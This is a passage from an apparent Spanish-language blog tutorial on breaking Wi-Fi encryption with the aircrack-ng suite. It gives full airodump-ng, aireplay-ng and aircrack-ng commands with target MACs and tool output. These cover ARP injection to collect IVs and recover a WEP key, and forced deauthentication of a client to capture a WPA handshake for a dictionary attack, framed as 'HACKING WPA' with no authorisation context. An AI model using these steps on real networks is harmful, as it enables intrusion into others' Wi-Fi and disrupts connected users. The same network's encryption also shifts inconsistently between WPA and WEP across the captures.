BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  98      327     1033   89   6  54  WPA  TKIP   PSK  SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D   78  36-54    39     1012
Ahora el truco es la inyección de tráfico ARP al Access Point, la idea de este ataque es obligar al Access Point a que de información de su tabla ARP para que el atacante recoja información sobre las IVS. Entonces en otra ventana y sin dejar de ejecutar el airodump se ejecutar este otro comando:


spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0

El -3 significa un ataque de inyección de ARP el –b es la MAC del Access Point el –h es la MAC del cliente que esta asociado al Access Point el –x son la cantidad de paquetes por segundo que se le enviara al access point.

spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0
The interface MAC (00:1B:11:20:D2:27) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:0E:35:8C:1C:1D
20:37:07  Waiting for beacon frame (BSSID: 00:1B:11:D4:54:63) on channel 6
Saving ARP requests in replay_arp-0608-203707.cap
You should also start airodump-ng to capture replies.
Read 82899 packets (got 145 ARP requests and 0 ACKs), sent 727522 packets...(1024 pps)?

Se sabrá que el ataque ha empezado cuando sent xxxx packets haya empezado a subir, también podremos ver que la cantidad de IVS enviados ha aumentado, esto podría tomarse como la forma de aumentar los IVS( “los IVS son los mismos que se muestra en la pantalla de airodump en la parte de #Data”)


CH  6 ][ Elapsed: 18 mins ][ 2008-06-08 20:55

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  48     8472    7003  117   6  54  WEP  WEP         SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D  116  48-54    31   107446

Si se fijan los paquetes han aumentado de 1033 a 7003 considerablemente.

Ahora por ultimo pondremos a descifrar la clave, esta es la parte más fácil y maravillosa, porque es automática. Por lo general el aircrack necesita como mínimo tomar 5000 IVS, si no son suficientes el le dirá que aumente los IVS a 10000 así consecutivamente de 5000 en 5000. Lo bueno de esto es que después de ejecutar este comando y al salir este error el continuara su trabajo cuando ud ya tenga los 10000 IVS.


Así que podrá ejecutar este comando al momento de ejecutar el ataque de ARP, mientras tanto podrá ir a ver la novela para que no se pierda ningún momento o a ver una película o salir, el hará todo el trabajo por ud. Según nuestras pruebas mínimo eran 25000 IVS yo alguna vez alcance a necesitar 35000 IVS y hasta 40000IVS eso por la lejanía del Access Point, y claro después de 2 horas obtuve la clave, pero eso sí de que es fijo tener la clave es fijo, y alégrense cuando salga el mensaje de KEY FOUND!







HACKING WPA

En WPA la única forma de poder hacker es con diccionario, pues si quieren intentar pues acá le tengo la formula, el secreto de este ataque es tener un buen diccionario.
Para esto usaremos una inyeccion agresiva deautenticando a un usuario para obtener un handshake, asi que empezaremos usando el airodump como lo había usado antes

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0


Luego en otra ventana ejecuntan esto:

spiderpig:~/hackwifi# aireplay-ng -0 5 -a 00:1B:11:D4:54:63  -c 00:0E:35:8C:1C:1D -wlan0

Esto hace que deatentiquen a un usuario para poder escucharlo y obtener algunas tramas, y poder pasar al ataque de diccionario. El -0 siginifica deutenticacion y seguido se le manda la cantidad de deautenticaciones que quiere enviar, con 5 son suficientes.

Después de esto se debe ejecutar el wpa de la siguiente forma:

spiderpig:~/hackwifi# aircrack-ng -a 2 -0 -w /media/win2/Andres/dictionaries/word/word.lst spider.cap

-a siginifica modo de ataque seguido de 2 que significa WPA/WPA2 – PSK –w siginifica la dirección del diccionario,  pueden intentar en esta pagina, estan organizados por idioma, http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/

Opening spider-01.cap
Read 308 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:11:D4:54:63  SPIDERPIG                 WPA (1 handshake)
   2  00:16:B6:31:04:B9  eparrar                   WPA (0 handshake)
  
Index number of target network ?

Al ver que obtenga un handshake como en este caso el de SPIDERPIG solo queda escoger esta red, osea oprimimos 1 y damos ENTER. Aircrack tratara de descifrar la clave con el diccionario, la verdad no se cuanto se demore esto,lo cierto es que hay que tener algo de paciencia.


0 comentarios more...
Con la tecnología de Blogger.

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!